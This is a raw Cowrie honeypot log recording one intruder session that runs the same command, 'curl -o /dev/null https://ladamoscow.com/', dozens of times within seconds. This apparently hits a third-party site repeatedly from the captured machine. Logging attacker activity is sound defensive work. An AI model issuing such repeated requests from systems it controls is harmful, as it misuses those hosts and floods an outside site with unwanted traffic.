{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.533171Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.534330Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.574154Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.574958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.613238Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.614458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.651727Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.652787Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.694824Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.695907Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.733519Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.734965Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.772137Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.773248Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.816004Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.817019Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.859808Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.861241Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.900948Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.902075Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.939415Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.940705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:01.979350Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:01.980416Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.017680Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.018822Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.056231Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.057294Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.096101Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.097058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.136081Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.137116Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.174200Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.175589Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.213097Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.214186Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.254549Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.255553Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.294426Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.295772Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.335693Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.336760Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.374106Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.375076Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.411957Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.413007Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.450806Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.451955Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.494993Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.496116Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.535574Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.536843Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.583168Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.584265Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.623202Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.624521Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.662058Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.663034Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.703338Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.704304Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.740917Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.742164Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.779801Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.780783Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.819793Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.820762Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.857487Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.859905Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.898276Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.899307Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.936020Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.937041Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:02.975447Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:02.976389Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.014226Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.015390Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.064009Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.065208Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.104594Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.105717Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.145679Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.146706Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.185291Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.186607Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.223601Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.224644Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.263165Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.264199Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.301788Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.302922Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.340721Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.341743Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.381623Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.382426Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.421920Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.422632Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.462866Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.463979Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.502463Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.503420Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.540476Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.541547Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.579196Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.580106Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.616752Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.618055Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.654767Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.655794Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.692835Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.693888Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.730728Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.731959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.773908Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.774978Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.812240Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.813284Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.852988Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.853967Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.895491Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.896548Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.935449Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.936503Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:03.979071Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:03.980042Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.019332Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.020320Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.063619Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:04.064866Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:04.102696Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
